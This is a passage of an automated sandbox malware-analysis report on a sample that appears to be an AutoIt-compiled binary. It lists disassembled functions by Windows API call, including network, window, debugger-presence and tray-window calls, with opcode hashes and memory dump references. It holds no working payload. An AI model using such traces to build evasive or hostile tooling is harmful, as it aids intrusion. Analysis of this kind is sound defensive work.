                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$DestroyMove
                                                                          • String ID: static
                                                                          • API String ID: 2139405536-2160076837
                                                                          • Opcode ID: dbb219dc1955b09dd9df54c2a7d50c43d7776a99cbdb7c826e5f4dc6ac13c938
                                                                          • Instruction ID: 178d866640434f40083863bf50c962aab4f888d6e58ed1618a43efb1bea07c56
                                                                          • Opcode Fuzzy Hash: dbb219dc1955b09dd9df54c2a7d50c43d7776a99cbdb7c826e5f4dc6ac13c938
                                                                          • Instruction Fuzzy Hash: A2318D71200604AEDF129F69DC81BFB73A9FF48760F11861AF9A9D7190DA31AC81C760
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00372911
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0037294C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: 8b0561c48f92507d5818bd2be9c565af09f4c227ee2d0b3c9a3679555f1c09ec
                                                                          • Instruction ID: 05e97bc5270d204a55df3e0b6cfae8fee3d29bf66c2dc774d1795632277527a8
                                                                          • Opcode Fuzzy Hash: 8b0561c48f92507d5818bd2be9c565af09f4c227ee2d0b3c9a3679555f1c09ec
                                                                          • Instruction Fuzzy Hash: BA31E9316003059FDB37CF58D885BAFBBF8EF46350F198019EA89A61A0D7749950DB51
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00396761
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0039676C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          • Opcode ID: 296cc6c3fda535dfad28d76f4470338c3c668b2fd50b7ad29d4bfb2a44df57e6
                                                                          • Instruction ID: 743ae9e80441a08abbd1c71e44c3e737cb79d5cab899fae8b223ba3b5cc0696c
                                                                          • Opcode Fuzzy Hash: 296cc6c3fda535dfad28d76f4470338c3c668b2fd50b7ad29d4bfb2a44df57e6
                                                                          • Instruction Fuzzy Hash: 2F118275211208AFEF179F94DC82EFB376EEB493A8F124129F9149B290D671DC5187A0
                                                                          APIs
                                                                            • Part of subcall function 00311D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00311D73
                                                                            • Part of subcall function 00311D35: GetStockObject.GDI32(00000011), ref: 00311D87
                                                                            • Part of subcall function 00311D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00311D91
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00396C71
                                                                          • GetSysColor.USER32(00000012), ref: 00396C8B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 1983116058-2160076837
                                                                          • Opcode ID: e82ee7c99d76eaf2bd6e69620c43b2869016ead843e7e1e1b212a2c5d7c8088b
                                                                          • Instruction ID: 06ce99199ba977ed0c7523e2b620d722d4b13555baa23eeabf77986849a79d6c
                                                                          • Opcode Fuzzy Hash: e82ee7c99d76eaf2bd6e69620c43b2869016ead843e7e1e1b212a2c5d7c8088b
                                                                          • Instruction Fuzzy Hash: 5F212972510209AFDF06DFA8DC46AFA7BA8FB08314F114629F995D2250D735E850DB60
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 003969A2
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003969B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          • Opcode ID: c5c6bd1ee1638964ff6f23f303a27061e993456b22e46561fd221978a4bb28da
                                                                          • Instruction ID: 14efc325fefd7a986f143afb9854452a2a16a4a6052f662b255f7f5dc6eb6942
                                                                          • Opcode Fuzzy Hash: c5c6bd1ee1638964ff6f23f303a27061e993456b22e46561fd221978a4bb28da
                                                                          • Instruction Fuzzy Hash: 38116D71502204AFEF128E649C46EEB376DEB06378F514724F9A5961E0C735DC509760
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00372A22
                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00372A41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: e7560456ab8040fb82c0b381d762408b69e656ed41a938fb52796df13d6b64e5
                                                                          • Instruction ID: 05304f0c80b2b2446a2c44d855d5bee980411b090e96adb45ea36dfc838f93bf
                                                                          • Opcode Fuzzy Hash: e7560456ab8040fb82c0b381d762408b69e656ed41a938fb52796df13d6b64e5
                                                                          • Instruction Fuzzy Hash: CA11D332D01118AFCB73DB58D844B9B73BCAB46300F168022E95DE7290DB34AD06C791
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0038222C
                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00382255
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$OpenOption
                                                                          • String ID: <local>
                                                                          • API String ID: 942729171-4266983199
                                                                          • Opcode ID: 2059d0b1ec01c2fa8929982b1901f14ea6bf71a1d8499b8a8f235a80f4d25477
                                                                          • Instruction ID: 07b1957d52f79e437ed0d42e1ca058bb83ab7ce973156354fff4531b8fc37449
                                                                          • Opcode Fuzzy Hash: 2059d0b1ec01c2fa8929982b1901f14ea6bf71a1d8499b8a8f235a80f4d25477
                                                                          • Instruction Fuzzy Hash: 8711A0B0541325BEDB66AF518C88EBBFBACFF16751F10866AF91586400D2705990D7F0
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00313C14,003D52F8,?,?,?), ref: 0032096E
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • _wcscat.LIBCMT ref: 00354CB7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FullNamePath_memmove_wcscat
                                                                          • String ID: S=
                                                                          • API String ID: 257928180-768595482
                                                                          • Opcode ID: b139a250bc44ac69f906135999d515d741bf576305ed34a62a6af46786e0d5c3
                                                                          • Instruction ID: cef7dec4bcfce08637958d7213392bf3206ff281f80297bbdeaf0206f3887c12
                                                                          • Opcode Fuzzy Hash: b139a250bc44ac69f906135999d515d741bf576305ed34a62a6af46786e0d5c3
                                                                          • Instruction Fuzzy Hash: 4111A535A05218ABCB47FBA4E846FDD73F8AF0C350F0044A6F945DB296EB70A6C84B50
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00368E73
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 684c4e7cf6b495f04a44c989455de02fb82907e86dfba7f824a1cfe45c8bec06
                                                                          • Instruction ID: d908676b6a89174faaaef134d3fedf933e43ef5cee6f0f269037771475c67c51
                                                                          • Opcode Fuzzy Hash: 684c4e7cf6b495f04a44c989455de02fb82907e86dfba7f824a1cfe45c8bec06
                                                                          • Instruction Fuzzy Hash: 4001F5B1615218AB8B1AEBA0CC42DFE736CAF09320B044A19F831AB2D1DE325818C650
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00368D6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 9289ad556c129735d311f9ffb6927cdff75bf742eed44fc400a056a81fec29ed
                                                                          • Instruction ID: 110bea2bbd3622a0cd0052c91a0db815141a6eab45f42d1799ff0e253978ad98
                                                                          • Opcode Fuzzy Hash: 9289ad556c129735d311f9ffb6927cdff75bf742eed44fc400a056a81fec29ed
                                                                          • Instruction Fuzzy Hash: 0701F771A41108ABCB1BEBE0C956EFE73ACDF19300F14411AB801BB2D5DE119E18D672
                                                                          APIs
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                            • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00368DEE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: b38fb35fb5d6d92f6cc147ff006151cc534a93b9c44ce3ae65e7f2a3a93607e7
                                                                          • Instruction ID: 531f317eb00ea0fb2d1de92fcf6573452798cb014a6002596b0b9201dd8aad18
                                                                          • Opcode Fuzzy Hash: b38fb35fb5d6d92f6cc147ff006151cc534a93b9c44ce3ae65e7f2a3a93607e7
                                                                          • Instruction Fuzzy Hash: 12012B71A45108BBCB17E7E4C952EFE73ACCF19300F144116B801B72D5DE114E18D672
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0036C534
                                                                            • Part of subcall function 0036C816: _memmove.LIBCMT ref: 0036C860
                                                                            • Part of subcall function 0036C816: VariantInit.OLEAUT32(00000000), ref: 0036C882
                                                                            • Part of subcall function 0036C816: VariantCopy.OLEAUT32(00000000,?), ref: 0036C88C
                                                                          • VariantClear.OLEAUT32(?), ref: 0036C556
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Init$ClearCopy_memmove
                                                                          • String ID: d}<
                                                                          • API String ID: 2932060187-90292690
                                                                          • Opcode ID: 24949f50fc333216823f170f12d7827553b360bcdaeefc564223c8264f2bd79f
                                                                          • Instruction ID: 5f7897e9a7f54b4dd9891a5a1e236899ebcd92c155453a68f100768d62a06d18
                                                                          • Opcode Fuzzy Hash: 24949f50fc333216823f170f12d7827553b360bcdaeefc564223c8264f2bd79f
                                                                          • Instruction Fuzzy Hash: 7B11FA719007089FC721DFAAD88499AB7F8FB08310B50862FE58AD7611E771AA45CF90
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp
                                                                          • String ID: #32770
                                                                          • API String ID: 2292705959-463685578
                                                                          • Opcode ID: e4e7b2b1f1e4a5481f47a0229f5791848675113fb63a4a00075ae4daa868e0b3
                                                                          • Instruction ID: 6d17ff3a7e4ba098244694385331acb7ca576fb01aa6bcb6cb4dc7f580bea7f5
                                                                          • Opcode Fuzzy Hash: e4e7b2b1f1e4a5481f47a0229f5791848675113fb63a4a00075ae4daa868e0b3
                                                                          • Instruction Fuzzy Hash: B8E0D8326002282BE7219B99AC4AFA7F7ACEB46B70F01006BFD04D7051DA70AB5587E1
                                                                          APIs
                                                                            • Part of subcall function 0034B314: _memset.LIBCMT ref: 0034B321
                                                                            • Part of subcall function 00330940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0034B2F0,?,?,?,0031100A), ref: 00330945
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0031100A), ref: 0034B2F4
                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0031100A), ref: 0034B303
                                                                          Strings
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0034B2FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                          • API String ID: 3158253471-631824599
                                                                          • Opcode ID: 4ab3db112215858b90e4d4e9755d74d82cea89e42a54cd814fafadcce716bc8e
                                                                          • Instruction ID: 4c873e3cbf09df3ea18e183b82571a2ae940794d9e5c42571e62724fc43cbced
                                                                          • Opcode Fuzzy Hash: 4ab3db112215858b90e4d4e9755d74d82cea89e42a54cd814fafadcce716bc8e
                                                                          • Instruction Fuzzy Hash: 5EE092782007108FD727DF2AE504386BBE8AF04348F018E2DE486CB650E7B5E444CBA1
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00367C82
                                                                            • Part of subcall function 00333358: _doexit.LIBCMT ref: 00333362
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283
                                                                          • Opcode ID: bd9168fd2e41962331631a2e4d53b39833dd5bb6da9844139d3ea1104923df22
                                                                          • Instruction ID: 5b91c96e8e11612049338559dcb3d6406b9376789f9d230b1fa12cc16b27ec67
                                                                          • Opcode Fuzzy Hash: bd9168fd2e41962331631a2e4d53b39833dd5bb6da9844139d3ea1104923df22
                                                                          • Instruction Fuzzy Hash: 33D0123238835836D21732A56C46FDA65488F05B66F044426FB049D5D349D2899042A5
                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00351775
                                                                            • Part of subcall function 0038BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0035195E,?), ref: 0038BFFE
                                                                            • Part of subcall function 0038BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038C010
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0035196D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                          • String ID: WIN_XPe
                                                                          • API String ID: 582185067-3257408948
                                                                          • Opcode ID: c1946b31641fa09a8169c06afcb65995b9e510f21cbf47650b279f1a839ebf58
                                                                          • Instruction ID: d50cbec8920be4e3d4b42899827820fa7ff80308b7df88811f110d26452360a5
                                                                          • Opcode Fuzzy Hash: c1946b31641fa09a8169c06afcb65995b9e510f21cbf47650b279f1a839ebf58
                                                                          • Instruction Fuzzy Hash: 82F0A571801109EFDB16DB95D984BECBBBCAB0C302F541096E502A65A1D7754F88DF60
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00395981
  • Part of subcall function 00375244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 72a04847271583d91241c99085689b240b56c9206cdaeb7930e99a96ee05f08c
• Instruction ID: 0e18368bd11e646b28254407b36a985e4b80f4253e1889c5e33b0e5cbb79287a
• Opcode Fuzzy Hash: 72a04847271583d91241c99085689b240b56c9206cdaeb7930e99a96ee05f08c
• Instruction Fuzzy Hash: 4DD0C931784311BBE769AB709C0BFD76A18AB01B51F01082AB24AEA1D1C9E59C00C654
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003959AE
• PostMessageW.USER32(00000000), ref: 003959B5
  • Part of subcall function 00375244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: f29a2498c830342a781e5274bcf4761eeaac0bb33e71d3b46b9a3d3a253222f4
• Instruction ID: 4a47593c439972edc2aa22c210813c6a97026c9cc21a0296fb45d5136455377a
